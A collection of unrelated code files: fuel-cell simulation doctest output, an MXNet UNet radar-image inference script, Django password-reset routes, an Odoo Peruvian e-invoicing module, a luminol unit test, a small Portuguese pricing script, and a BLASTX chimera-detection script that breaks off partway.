FC Efficiency : 0.5901112348363035
FC Power : 2.3014338158615835 W
FC Voltage : 4.602867631723167 V
Loss : 0.2931083433758999 V
PH2 : 0.19711454080634436 atm
PH2O : 0.24261398698137834 atm
PO2 : 0.1905946372855047 atm
Power-Thermal : 0.7735661841384167 W
###########
I : 0.6
E : 6.0684078107750326 V
Eta Activation : 0.3041956781419353 V
Eta Concentration : 0.00012698479353178086 V
Eta Ohmic : 0.0010546098289093816 V
FC Efficiency : 0.582246339352968
FC Power : 2.72491286817189 W
FC Voltage : 4.54152144695315 V
Loss : 0.3053772727643765 V
PH2 : 0.19710049042472996 atm
PH2O : 0.2425966933860498 atm
PO2 : 0.1905867044473064 atm
Power-Thermal : 0.9650871318281099 W
###########
I : 0.7
E : 6.068406272883388 V
Eta Activation : 0.31440243547871893 V
Eta Concentration : 0.000148247255132642 V
Eta Ohmic : 0.0012307785370829418 V
FC Efficiency : 0.5755767905806046
FC Power : 3.142649276570101 W
FC Voltage : 4.489498966528716 V
Loss : 0.3157814612709345 V
PH2 : 0.19708644004311557 atm
PH2O : 0.24257939979072127 atm
PO2 : 0.19057877160910808 atm
Power-Thermal : 1.162350723429899 W
###########
I : 0.8
E : 6.068404734927729 V
Eta Activation : 0.3232442167420945 V
Eta Concentration : 0.00016953801010392253 V
Eta Ohmic : 0.0014070620817435461 V
FC Efficiency : 0.5697821347125663
FC Power : 3.555440520606415 W
FC Voltage : 4.444300650758018 V
Loss : 0.32482081683394204 V
PH2 : 0.19707238966150117 atm
PH2O : 0.24256210619539273 atm
PO2 : 0.1905708387709098 atm
Power-Thermal : 1.3645594793935858 W
###########
I : 0.9
E : 6.068403196908046 V
Eta Activation : 0.3310434726426763 V
Eta Concentration : 0.00019085713384438152 V
Eta Ohmic : 0.0015834606415773538 V
FC Efficiency : 0.564655672412507
FC Power : 3.9638828203358005 W
FC Voltage : 4.404314244817556 V
Loss : 0.332817790418098 V
PH2 : 0.19705833927988675 atm
PH2O : 0.24254481260006414 atm
PO2 : 0.19056290593271147 atm
Power-Thermal : 1.5711171796642 W
###########
I : 1.0
E : 6.068401658824337 V
Eta Activation : 0.33802037026202836 V
Eta Concentration : 0.00021220470205456714 V
Eta Ohmic : 0.0017599744011013664 V
FC Efficiency : 0.5600562707690275
FC Power : 4.368438911998416 W
FC Voltage : 4.368438911998416 V
Loss : 0.3399925493651843 V
PH2 : 0.19704428889827239 atm
PH2O : 0.2425275190047356 atm
PO2 : 0.1905549730945132 atm
Power-Thermal : 1.7815610880015846 W
###########
I : 1.1
E : 6.068400120676597 V
Eta Activation : 0.3443319458183834 V
Eta Concentration : 0.0002335807907384422 V
Eta Ohmic : 0.0019366035503462617 V
FC Efficiency : 0.5558832653691355
FC Power : 4.769478416867183 W
FC Voltage : 4.335889469879257 V
Loss : 0.34650213015946807 V
PH2 : 0.197030238516658 atm
PH2O : 0.24251022540940706 atm
PO2 : 0.19054704025631486 atm
Power-Thermal : 1.9955215831328177 W
###########
I : 1.2
E : 6.068398582464819 V
Eta Activation : 0.35009414904739194 V
Eta Concentration : 0.00025498547620500224 V
Eta Ohmic : 0.002113348284589288 V
FC Efficiency : 0.5520623292851136
FC Power : 5.167303402108664 W
FC Voltage : 4.306086168423887 V
Loss : 0.35246248280818626 V
PH2 : 0.1970161881350436 atm
PH2O : 0.24249293181407852 atm
PO2 : 0.19053910741811658 atm
Power-Thermal : 2.212696597891336 W
###########
I : 1.3
E : 6.068397044188998 V
Eta Activation : 0.35539503345654255 V
Eta Concentration : 0.0002764188350699048 V
Eta Ohmic : 0.0022902088041253615 V
FC Efficiency : 0.548537017783373
FC Power : 5.562165360323403 W
FC Voltage : 4.27858873871031 V
Loss : 0.3579616610957378 V
PH2 : 0.19700213775342923 atm
PH2O : 0.24247563821874998 atm
PO2 : 0.19053117457991825 atm
Power-Thermal : 2.4328346396765976 W
###########
I : 1.4
E : 6.06839550584913 V
Eta Activation : 0.36030304442922906 V
Eta Concentration : 0.00029788094425712723 V
Eta Ohmic : 0.0024671853140681515 V
FC Efficiency : 0.5452634554373536
FC Power : 5.954276933375901 W
FC Voltage : 4.253054952411358 V
Loss : 0.36306811068755435 V
PH2 : 0.19698808737181484 atm
PH2O : 0.24245834462342142 atm
PO2 : 0.19052324174171997 atm
Power-Thermal : 2.6557230666240987 W
###########
I : 1.5
E : 6.068393967445208 V
Eta Activation : 0.3648724409731032 V
Eta Concentration : 0.00031937188100060893 V
Eta Ohmic : 0.002644278024175193 V
FC Efficiency : 0.5422068606479247
FC Power : 6.343820269580719 W
FC Voltage : 4.229213513053812 V
Loss : 0.367836090878279 V
PH2 : 0.19697403699020044 atm
PH2O : 0.24244105102809288 atm
PO2 : 0.19051530890352164 atm
Power-Thermal : 2.881179730419282 W
###########
I : 1.6
E : 6.068392428977227 V
Eta Activation : 0.36914696409844006 V
Eta Concentration : 0.0003408917228459314 V
Eta Ohmic : 0.0028214871486926026 V
FC Efficiency : 0.539339194118889
FC Power : 6.7309531426037355 W
FC Voltage : 4.2068457141273345 V
Loss : 0.3723093429699786 V
PH2 : 0.19695998660858605 atm
PH2O : 0.24242375743276434 atm
PO2 : 0.19050737606532336 atm
Power-Thermal : 3.1090468573962653 W
###########
I : 1.7
E : 6.068390890445182 V
Eta Activation : 0.3731623911228729 V
Eta Concentration : 0.00036244054765199196 V
Eta Ohmic : 0.0029988129062160497 V
FC Efficiency : 0.5366375214822406
FC Power : 7.115813534854511 W
FC Voltage : 4.185772667561477 V
Loss : 0.376523644576741 V
PH2 : 0.19694593622697168 atm
PH2O : 0.2424064638374358 atm
PO2 : 0.19049944322712503 atm
Power-Thermal : 3.339186465145489 W
###########
I : 1.8
E : 6.068389351849069 V
Eta Activation : 0.3769483587657406 V
Eta Concentration : 0.00038401843359268825 V
Eta Ohmic : 0.003176255519565377 V
FC Efficiency : 0.5340828446480225
FC Power : 7.4985231388582365 W
FC Voltage : 4.165846188254576 V
Loss : 0.3805086327188987 V
PH2 : 0.19693188584535729 atm
PH2O : 0.24238917024210727 atm
PO2 : 0.19049151038892673 atm
Power-Thermal : 3.5714768611417647 W
###########
I : 1.9
E : 6.068387813188879 V
Eta Activation : 0.38052969267197334 V
Eta Concentration : 0.00040562545915863245 V
Eta Ohmic : 0.0033538152156708046 V
FC Efficiency : 0.5316592495454955
FC Power : 7.8791900782642434 W
FC Voltage : 4.146942146454865 V
Loss : 0.38428913334680276 V
PH2 : 0.1969178354637429 atm
PH2O : 0.24237187664677873 atm
PO2 : 0.19048357755072845 atm
Power-Thermal : 3.8058099217357566 W
###########
I : 2.0
E : 6.0683862744646095 V
Eta Activation : 0.3839273955127959 V
Eta Concentration : 0.0004272617031588504 V
Eta Ohmic : 0.003531492225469087 V
FC Efficiency : 0.5293532727253193
FC Power : 8.257911054514981 W
FC Voltage : 4.1289555272574905 V
Loss : 0.3878861494414239 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 4.04208894548502 W
###########
I : 2.1
E : 6.068384735676256 V
Eta Activation : 0.38715939375662295 V
Eta Concentration : 0.00044892724472251814 V
Eta Ohmic : 0.0037092867838082735 V
FC Efficiency : 0.5271534226603188
FC Power : 8.634773063176024 W
FC Voltage : 4.1117966967504875 V
Loss : 0.39131760778515373 V
PH2 : 0.19688973470051413 atm
PH2O : 0.24233728945612165 atm
PO2 : 0.19046771187433184 atm
Power-Thermal : 4.280226936823977 W
###########
I : 2.2
E : 6.068383196823811 V
Eta Activation : 0.39024111055794025 V
Eta Concentration : 0.00047062216330069346 V
Eta Ohmic : 0.0038871991293599716 V
FC Efficiency : 0.5250498125090778
FC Power : 9.009854782655777 W
FC Voltage : 4.095388537570807 V
Loss : 0.3945989318506009 V
PH2 : 0.19687568431889974 atm
PH2O : 0.2423199958607931 atm
PO2 : 0.1904597790361335 atm
Power-Thermal : 4.520145217344226 W
###########
I : 2.3
E : 6.068381657907269 V
Eta Activation : 0.39318591119501267 V
Eta Concentration : 0.0004923465386680586 V
Eta Ohmic : 0.004065229504538212 V
FC Efficiency : 0.5230338745789967
FC Power : 9.383227709947201 W
FC Voltage : 4.0796642217161745 V
Loss : 0.3977434872382189 V
PH2 : 0.19686163393728537 atm
PH2O : 0.24230270226546458 atm
PO2 : 0.19045184619793523 atm
Power-Thermal : 4.761772290052799 W
###########
I : 2.4
E : 6.068380118926627 V
Eta Activation : 0.3960054536369255 V
Eta Concentration : 0.0005141004509246927 V
Eta Ohmic : 0.004243378155424144 V
FC Efficiency : 0.5210981356038789
FC Power : 9.754957098504613 W
FC Voltage : 4.0645654577102555 V
Loss : 0.40076293224327436 V
PH2 : 0.19684758355567097 atm
PH2O : 0.242285408670136 atm
PO2 : 0.1904439133597369 atm
Power-Thermal : 5.005042901495387 W
###########
I : 2.5
E : 6.068378579881878 V
Eta Activation : 0.39870996749954657 V
Eta Concentration : 0.0005358839804978295 V
Eta Ohmic : 0.00442164533169592 V
FC Efficiency : 0.5192360379260482
FC Power : 10.12510273955794 W
FC Voltage : 4.050041095823176 V
Loss : 0.4036674968117403 V
PH2 : 0.19683353317405658 atm
PH2O : 0.24226811507480747 atm
PO2 : 0.19043598052153862 atm
Power-Thermal : 5.24989726044206 W
###########
I : 2.6
E : 6.068377040773017 V
Eta Activation : 0.40130847825734167 V
Eta Concentration : 0.0005576972081436541 V
Eta Ohmic : 0.004600031286563196 V
FC Efficiency : 0.5174417957708685
FC Power : 10.493719618233213 W
FC Voltage : 4.036046007012774 V
Loss : 0.40646620675204853 V
PH2 : 0.19681948279244216 atm
PH2O : 0.2422508214794789 atm
PO2 : 0.1904280476833403 atm
Power-Thermal : 5.4962803817667885 W
###########
I : 2.7
E : 6.068375501600038 V
Eta Activation : 0.4038089891176398 V
Eta Concentration : 0.0005795402149490941 V
Eta Ohmic : 0.004778536276705824 V
FC Efficiency : 0.5157102786607133
FC Power : 10.860858468594623 W
FC Voltage : 4.022540173553564 V
Loss : 0.4091670656092947 V
PH2 : 0.19680543241082776 atm
PH2O : 0.24223352788415034 atm
PO2 : 0.190420114845142 atm
Power-Thermal : 5.744141531405379 W
###########
I : 2.8
E : 6.068373962362936 V
Eta Activation : 0.40621862980268425 V
Eta Concentration : 0.0006014130823336223 V
Eta Ohmic : 0.004957160562216277 V
FC Efficiency : 0.5140369160418929
FC Power : 11.226566246354942 W
FC Voltage : 4.009487945126765 V
Loss : 0.4117772034472342 V
PH2 : 0.1967913820292134 atm
PH2O : 0.2422162342888218 atm
PO2 : 0.19041218200694368 atm
Power-Thermal : 5.993433753645058 W
###########
I : 2.9
E : 6.068372423061707 V
Eta Activation : 0.4085437792118771 V
Eta Concentration : 0.0006233158920510905 V
Eta Ohmic : 0.005135904406545483 V
FC Efficiency : 0.5124176186550433
FC Power : 11.590886533977079 W
FC Voltage : 3.996857425509338 V
Loss : 0.4143029995104737 V
PH2 : 0.196777331647599 atm
PH2O : 0.24219894069349326 atm
PO2 : 0.1904042491687454 atm
Power-Thermal : 6.244113466022921 W
###########
I : 3.0
E : 6.0683708836963435 V
Eta Activation : 0.4107901672807063 V
Eta Concentration : 0.0006452487261915484 V
Eta Ohmic : 0.005314768076451755 V
FC Efficiency : 0.5108487132409738
FC Power : 11.953859889838787 W
FC Voltage : 3.9846199632795956 V
Loss : 0.4167501840833496 V
PH2 : 0.1967632812659846 atm
PH2O : 0.24218164709816473 atm
PO2 : 0.19039631633054707 atm
Power-Thermal : 6.496140110161214 W
###########
I : 3.1
E : 6.068369344266841 V
Eta Activation : 0.4129629601316751 V
Eta Concentration : 0.0006672116671831024 V
Eta Ohmic : 0.0054937518419525275 V
FC Efficiency : 0.5093268879567676
FC Power : 12.315524150794642 W
FC Voltage : 3.9727497260627875 V
Loss : 0.41912392364081075 V
PH2 : 0.19674923088437024 atm
PH2O : 0.2421643535028362 atm
PO2 : 0.1903883834923488 atm
Power-Thermal : 6.74947584920536 W
###########
I : 3.2
E : 6.068367804773196 V
Eta Activation : 0.41506683170178466 V
Eta Concentration : 0.0006892047977937692 V
Eta Ohmic : 0.005672855976278701 V
FC Efficiency : 0.5078491464607577
FC Power : 12.675914695660513 W
FC Voltage : 3.96122334239391 V
Loss : 0.42142889247585713 V
PH2 : 0.19673518050275585 atm
PH2O : 0.24214705990750765 atm
PO2 : 0.19038045065415046 atm
Power-Thermal : 7.0040853043394895 W
###########
I : 3.3
E : 6.0683662652154 V
Eta Activation : 0.417106024344736 V
Eta Concentration : 0.0007112282011333409 V
Eta Ohmic : 0.005852080755831333 V
FC Efficiency : 0.5064127690649867
FC Power : 13.035064675732759 W
FC Voltage : 3.9500195987068967 V
Loss : 0.42366933330170065 V
PH2 : 0.19672113012114145 atm
PH2O : 0.2421297663121791 atm
PO2 : 0.19037251781595219 atm
Power-Thermal : 7.259935324267242 W
###########
I : 3.4
E : 6.06836472559345 V
Eta Activation : 0.4190844003836543 V
Eta Concentration : 0.0007332819606552831 V
Eta Ohmic : 0.0060314264601405215 V
FC Efficiency : 0.5050152796886153
FC Power : 13.393005217342077 W
FC Voltage : 3.9391191815711992 V
Loss : 0.42584910880445015 V
PH2 : 0.19670707973952706 atm
PH2O : 0.24211247271685057 atm
PO2 : 0.19036458497775385 atm
Power-Thermal : 7.516994782657924 W
###########
I : 3.5
E : 6.068363185907339 V
Eta Activation : 0.42100548618901656 V
Eta Concentration : 0.0007553661601586168 V
Eta Ohmic : 0.006210893371826288 V
FC Efficiency : 0.503654417602863
FC Power : 13.74976560055816 W
FC Voltage : 3.9285044573023313 V
Loss : 0.4279717457210015 V
PH2 : 0.1966930293579127 atm
PH2O : 0.24209517912152204 atm
PO2 : 0.19035665213955555 atm
Power-Thermal : 7.775234399441842 W
###########
I : 3.6
E : 6.068361646157063 V
Eta Activation : 0.4228725100457559 V
Eta Concentration : 0.000777480883789843 V
Eta Ohmic : 0.006390481776561363 V
FC Efficiency : 0.5023281131572472
FC Power : 14.105373417455501 W
FC Voltage : 3.918159282626528 V
Loss : 0.43004047270610707 V
PH2 : 0.1966789789762983 atm
PH2O : 0.2420778855261935 atm
PO2 : 0.19034871930135727 atm
Power-Thermal : 8.034626582544501 W
###########
I : 3.7
E : 6.068360106342617 V
Eta Activation : 0.4246884348310017 V
Eta Concentration : 0.0007996262160448594 V
Eta Ohmic : 0.00657019196303564 V
FC Efficiency : 0.501034466832334
FC Power : 14.459854712781162 W
FC Voltage : 3.9080688412922058 V
Loss : 0.4320582530100822 V
PH2 : 0.1966649285946839 atm
PH2O : 0.24206059193086493 atm
PO2 : 0.19034078646315894 atm
Power-Thermal : 8.29514528721884 W
###########
I : 3.8
E : 6.068358566463993 V
Eta Activation : 0.4264559863331208 V
Eta Concentration : 0.0008218022417708932 V
Eta Ohmic : 0.006750024222922298 V
FC Efficiency : 0.4997717310865285
FC Power : 14.813234109404705 W
FC Voltage : 3.8982195024749227 V
Loss : 0.43402781279781405 V
PH2 : 0.19665087821306954 atm
PH2O : 0.2420432983355364 atm
PO2 : 0.19033285362496066 atm
Power-Thermal : 8.556765890595296 W
###########
I : 3.9
E : 6.068357026521189 V
Eta Activation : 0.42817767789163225 V
Eta Concentration : 0.0008440090461684635 V
Eta Ohmic : 0.006929978850845375 V
FC Efficiency : 0.49853829456127663
FC Power : 15.165534920554036 W
FC Voltage : 3.888598697577958 V
Loss : 0.4359516657886461 V
PH2 : 0.19663682783145514 atm
PH2O : 0.24202600474020786 atm
PO2 : 0.19032492078676233 atm
Power-Thermal : 8.819465079445965 W
###########
Report is generating ...
Done!
>>> Padulles_Amphlett_Data["Status"]
True
>>> Padulles_Amphlett_Data["P"][5]
2.72491286817189
>>> Padulles_Amphlett_Data["I"][5]
0.6
>>> Padulles_Amphlett_Data["V"][5]
4.54152144695315
>>> Padulles_Amphlett_Data["EFF"][5]
0.582246339352968
>>> Padulles_Amphlett_Data["PO2"][5]
0.1905867044473064
>>> Padulles_Amphlett_Data["PH2"][5]
0.19710049042472996
>>> Padulles_Amphlett_Data["PH2O"][5]
0.2425966933860498
>>> Padulles_Amphlett_Data["Ph"][5]
0.9650871318281099
>>> Padulles_Amphlett_Data["VE"][5]
4.553477553120023
>>> Padulles_Amphlett_Data["V0"]
4.698328442367755
>>> Padulles_Amphlett_Data["K"]
-0.24141814874622033
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)
>>> Padulles_Amphlett_Data["Status"]
False
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)
2.9
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)
[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"B":234,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.14455344314445 V
Eta Activation : 0.9092187394310518 V
Eta Concentration : 0.3085036702624245 V
Eta Ohmic : 4.63717533307516e+269 V
FC Efficiency : -2.9725482904327946e+269
FC Power : -2.3185876665375803e+269 W
FC Voltage : -2.3185876665375803e+270 V
Loss : 4.63717533307516e+269 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 2.3185876665375803e+269 W
###########
I : 2.0
E : 6.144553272737403 V
Eta Activation : 0.9103753288368093 V
Eta Concentration : 6.248702408698187 V
Eta Ohmic : 9.331810347802308e+270 V
FC Efficiency : -5.981929710129684e+270
FC Power : -9.331810347802308e+271 W
FC Voltage : -4.665905173901154e+271 V
Loss : 9.331810347802308e+270 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 9.331810347802308e+271 W
###########
I : 4.0
E : 6.144553093215826 V
Eta Activation : 0.9106431331307118 V
Eta Concentration : 12.668858203852476 V
Eta Ohmic : 1.8785852500552963e+271 V
FC Efficiency : -1.2042213141380103e+271
FC Power : -3.757170500110593e+272 W
FC Voltage : -9.392926250276482e+271 V
Loss : 1.8785852500552963e+271 V
PH2 : 0.19662277744984075 atm
PH2O : 0.24200871114487932 atm
PO2 : 0.19031698794856405 atm
Power-Thermal : 3.757170500110593e+272 W
###########
Report is generating ...
Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs
Done!
>>> shutil.rmtree("Padulles-Amphlett")
'''
|
import mxnet as mx
from mxnet import gluon
from mx_model import ModelUNet
import os
import numpy as np
from mxnet import nd
from mxnet import image
from skimage import io
from tqdm import tqdm
import multiprocessing
import warnings
import cv2
class TestDataSet(gluon.data.Dataset):
def __init__(self, samples, channel_in=15, channel_out=2, **kwargs):
super(TestDataSet, self).__init__(**kwargs)
self.data_root = '../nas/SRAD2018/SRAD2018_Test_2/'
self.data_scale = 80
self.channel_in = channel_in
self.channel_out = channel_out
self.samples = samples
def __getitem__(self, idx):
sample = self.samples[idx]
sample_root = self.data_root+sample
img_names = [im for im in os.listdir(sample_root) if 'png' in im]
if len(img_names) != 31:
print(self.data_root + sample, 'have {} images. not equal 31.'.format(len(img_names)))
exit(0)
img_names = sorted(img_names, key=lambda x: int(x[-7:-4]))[-15:]
# print(idx, sample_root)
# dt = []
# for name in img_names:
# try:
# tp = io.imread(sample_root + '/' + name)
# except:
# print(self.samples[idx])
# tp = nd.expand_dims(nd.squeeze(nd.array(tp)), axis=0)
# dt.append(tp)
# dd = nd.concat(*dt, dim=0)
# dd *= (dd != 255)
dt = []
for name in img_names:
tp = cv2.imread(sample_root+'/'+name, cv2.IMREAD_GRAYSCALE)[:, :, np.newaxis]
tp[tp == 255] = 0
dt.append(tp)
dd = np.concatenate(tuple(dt), axis=-1)
gx = cv2.Sobel(dd, cv2.CV_16S, 1, 0, 5)
gy = cv2.Sobel(dd, cv2.CV_16S, 0, 1, 5)
gx = cv2.convertScaleAbs(gx)
gy = cv2.convertScaleAbs(gy)
g = np.sqrt(gx * gx + gy * gy)
dd = np.concatenate((dd, g), axis=-1).transpose([2, 0, 1])
dd = nd.array(dd)
return dd.astype(np.float32)/self.data_scale
def __len__(self):
return len(self.samples)
def infer(samples, out_channel=3):
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0'
save_path = '../nas/SRAD2018Model/result/unet_grad/'
os.makedirs(save_path, exist_ok=True)
test_loader = gluon.data.DataLoader(TestDataSet(samples), batch_size=1, )
print('sample num: ', len(samples))
context = mx.gpu(1)
model = ModelUNet(out_channels=out_channel)
print('modle built !')
model.load_parameters('../nas/SRAD2018Model/weights/mx_ModelUNet_1to3_grad_epoch_45.param', ctx=context)
print('param loaded')
with warnings.catch_warnings():
warnings.simplefilter('ignore')
for idx, dt in tqdm(enumerate(test_loader)):
os.makedirs(save_path+samples[idx], exist_ok=True)
# print(idx, samples[idx])
out = model(dt.as_in_context(context))
out = np.clip(np.round(out.asnumpy()*80), 0, 255).astype(np.uint8)
out[out == 0] = 255
for i in range(6): #
j = i if i < out_channel else out_channel-1
io.imsave(save_path+samples[idx]+'/{}_f{:03d}.png'.format(samples[idx], i+1), out[0, j, :, :])
print('done')
if __name__ == '__main__':
data_root = '../nas/SRAD2018/SRAD2018_Test_2/'
sps = sorted([sp for sp in os.listdir(data_root) if os.path.isdir(data_root + sp)])
smps = [sps[i:i+1000] for i in range(0, len(sps), 1000)]
while smps:
pools = multiprocessing.Pool(4)
for i in range(4):
pools.apply_async(infer, args=(smps.pop(0), ))
pools.close()
pools.join()
|
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth import views as auth_views
urlpatterns = [
# Admin
url(r'^admin/', admin.site.urls),
# Core app
url(r'^', include('apps.core.urls', namespace='core')),
# Accounts app
url(r'^accounts/', include('apps.accounts.urls', namespace='accounts')),
url(
r'reset/$',
auth_views.PasswordResetView.as_view(),
name='password_reset'
),
url(
r'reset/done/$',
auth_views.PasswordResetDoneView.as_view(),
name='password_reset_done'
),
url(
r'reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
auth_views.PasswordResetConfirmView.as_view(),
name='password_reset_confirm'
),
url(
r'reset/complete/$',
auth_views.PasswordResetCompleteView.as_view(),
name='password_reset_complete'
),
]
|
idade = int(input('Digite sua idade :'))
if idade <= 5 :
valor = 10
elif idade >= 60 :
valor = 15
else :
valor = 25
print('Você pagara {} reais'.format(valor))
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import base64
import zipfile
import io
from requests.exceptions import ConnectionError, HTTPError, InvalidSchema, InvalidURL, ReadTimeout
from zeep.wsse.username import UsernameToken
from zeep import Client, Settings
from zeep.exceptions import Fault
from zeep.transports import Transport
from lxml import etree
from lxml.objectify import fromstring
from copy import deepcopy
from odoo import models, fields, api, _, _lt
from ..tools.facturaonline import facturaonline_jsonrpc
from ..tools.facturaonline import facturaonline_convert_data
from odoo.tools.pdf import OdooPdfFileReader, OdooPdfFileWriter
from odoo.exceptions import AccessError
from odoo.tools import html_escape
class AccountEdiFormat(models.Model):
_inherit = 'account.edi.format'
def _l10n_pe_edi_sign_invoices_facturaonline(self, invoice, edi_filename, edi_str):
#_l10n_pe_edi_sign_invoices_iap
credentials = self._l10n_pe_edi_get_sunat_facturaonline(invoice.company_id)
url = self.get_url_facturaonline(invoice)
edi_values = self._l10n_pe_edi_get_edi_values(invoice)
data_values = facturaonline_convert_data(invoice,edi_values)
result = facturaonline_jsonrpc(url, params=data_values, credentials=credentials, timeout=1500)
#result = iap_jsonrpc(url, params=rpc_params, timeout=1500)
#message = "Factura creada en facturaonline.pe " + "id de Factura " + result.get("idFactura")
return result
def _l10n_pe_edi_get_sunat_facturaonline(self, company):
self.ensure_one()
res = {}
res.update({
'enpoint': company.l10n_pe_edi_endpoint_facturaonline,
'acces_key': company.l10n_pe_edi_acces_key,
'secret_key': company.l10n_pe_edi_secret_key,
})
return res
def get_url_facturaonline(self, invoice):
url = invoice.company_id.l10n_pe_edi_endpoint_facturaonline
if invoice.l10n_latam_document_type_id.code == '01':
url = url + '/factura'
if invoice.l10n_latam_document_type_id.code == '03':
url = url + '/boleta'
if invoice.l10n_latam_document_type_id.code == '07':
url = url + '/notacredito'
if invoice.l10n_latam_document_type_id.code == '08':
url = url + '/notadebito'
return url
def _get_embedding_to_invoice_pdf_values(self, invoice):
""" Get the values to embed to pdf.
:returns: A dictionary {'name': name, 'datas': datas} or False if there are no values to embed.
* name: The name of the file.
* datas: The bytes ot the file.
"""
self.ensure_one()
redn = self._is_embedding_to_invoice_pdf_needed()
if not redn:
return False
if invoice.pdf_invoice:
datas = base64.b64decode(invoice.pdf_invoice)
return {'name': invoice.pdf_name_invoice, 'datas': datas}
else:
gen = invoice.generate_invoice_print()
if gen:
return gen
attachment = invoice._get_edi_attachment(self)
if not attachment or not self._is_embedding_to_invoice_pdf_needed():
return False
datas = base64.b64decode(attachment.with_context(bin_size=False).datas)
return {'name': attachment.name, 'datas': datas}
def _embed_edis_to_pdf(self, pdf_content, invoice):
""" Create the EDI document of the invoice and embed it in the pdf_content.
:param pdf_content: the bytes representing the pdf to add the EDIs to.
:param invoice: the invoice to generate the EDI from.
:returns: the same pdf_content with the EDI of the invoice embed in it.
"""
attachments = []
for edi_format in self.filtered(lambda edi_format: edi_format._is_embedding_to_invoice_pdf_needed()):
attach = edi_format._get_embedding_to_invoice_pdf_values(invoice)
if attach:
attachments.append(attach)
if attachments:
# Add the attachments to the pdf file
reader_buffer = io.BytesIO(attach['datas'])
reader = OdooPdfFileReader(reader_buffer, strict=False)
writer = OdooPdfFileWriter()
writer.cloneReaderDocumentRoot(reader)
# for vals in attachments:
# writer.addAttachment(vals['name'], vals['datas'])
buffer = io.BytesIO()
writer.write(buffer)
pdf_content = buffer.getvalue()
reader_buffer.close()
buffer.close()
return pdf_content |
import unittest
from luminol import exceptions
from luminol import Luminol
class TestLuminol(unittest.TestCase):
def setUp(self):
self.anomaly = ['A', 'B']
self.correlation = {
'A': ['m1', 'm2', 'm3'],
'B': ['m2', 'm1', 'm3']
}
self.luminol = Luminol(self.anomaly, self.correlation)
def test_get_result(self):
self.assertTrue(isinstance(self.luminol.get_root_causes(), dict))
self.assertEqual(self.luminol.get_root_causes()['A'], 'm1')
self.assertEqual(self.luminol.get_root_causes()['B'], 'm2')
# if __name__ == '__main__':
# unittest.main()
|
"""
The blastx output files must have a customized tubular output:
0-qseqid 1-qlen 2-seqid 3-slen 4-frame 5-pident
6-nident 7-length 8-mismatch 9-gapopen 10-qstart 11-qend
12-start 13-send 14-evalue 15-bitscore
Step 1: only look at HSPs that are long and sufficiently similar to the query
Step 2: check a block of HSPs from the a query-hit pair (hit_block) for self chimeras
Step 3: check a block of HSPs from the same query (query_block) for multi-gene chimeras
if no self chimera was detected. Out put two cut ranges with a and b after the names
output a ".cut" file for position to cut, and a ".info" file for validating cuts
Modify the PIDENT_CUTOFF and LENGTH_CUTOFF as needed for each data set
The difference between "trans-multi" vs. "trans-self" is only meaningful when
the blast database is from a single species
"""
import sys,os
PIDENT_CUTOFF = 30 #only look at HSPs >= this percentage similarity
LENGTH_CUTOFF = 100 #only look at HSPs >= this length
#calculate length of query coverage
def qcov(hsp):
return abs(hsp[11]-hsp[10]) + 1
#given two hsps, return True if
#overlap les than 20% of the shorter and overlap less than 60 bp
def separated(hsp1,hsp2):
length1 = qcov(hsp1)
length2 = qcov(hsp2)
start = min(hsp1[10],hsp1[11],hsp2[10],hsp2[11])
end = max(hsp1[10],hsp1[11],hsp2[10],hsp2[11])
overlap = length1+length2 - (end-start) + 1
#value of overlap can < 0 but only the upper limit maters
if overlap < min(60, 0.2*min(length1,length2)):
return True
else: return False
#expand query range given two hsps of the same query-hit pair
#both hsps are the same direction
def expand_range(hsp1,hsp2):
if hsp1 == []: return hsp2
if hsp2 == []: return hsp1
start1,end1,start2,end2 = hsp1[10],hsp1[11],hsp2[10],hsp2[11]
if start1 < end1 and start2 < end2:#both forward
start,end = min(start1,start2),max(end1,end2)
elif start1 > end1 and start2 > end2:#both reverse
start,end = max(start1,start2),min(end1,end2)
#no change if new hsp is of opposite direction
hsp1[10],hsp1[11] = start,end
return hsp1
#detect chimera from a block of hits
#block can be a query-hit block (only check for self-chimera)
#or block can be a query block (check both self and multi-gene chimera)
#return True if no chimera is detected, False if chimera is detected
#also write to out file the combined best HSP
def check_block(block,multigene):
#only one hsp -> not chimera
if len(block) == 1: return True
#summarize all pos and neg HSPs
pos,neg = [],[]
for hsp in block:
if hsp[4][0] == "-":
neg = expand_range(neg,hsp)
else:
pos = expand_range(pos,hsp)
#compare pos_hit and neg_hit
if (pos == [] and neg != []) or (neg == [] and pos != []):
return True #only has hits of one direction
elif separated(pos,neg):#has both direction and separate -> chimera!
#write range to cut
if multigene: #output both hsps
start1,end1 = min(pos[10],pos[11]),max(pos[10],pos[11])
start2,end2 = min(neg[10],neg[11]),max(neg[10],neg[11])
outfile1.write(pos[0]+" "+str(int(start1))+" "+str(int(end1))+" trans-multi\n")
outfile1.write(neg[0]+" "+str(int(start2))+" "+str(int(end2))+" trans-multi\n")
else:
if qcov(pos) > qcov(neg):
outhsp = pos #outhsp is the better covered of the two
else: outhsp = neg
start,end = min(outhsp[10],outhsp[11]),max(outhsp[10],outhsp[11]) #range to cut
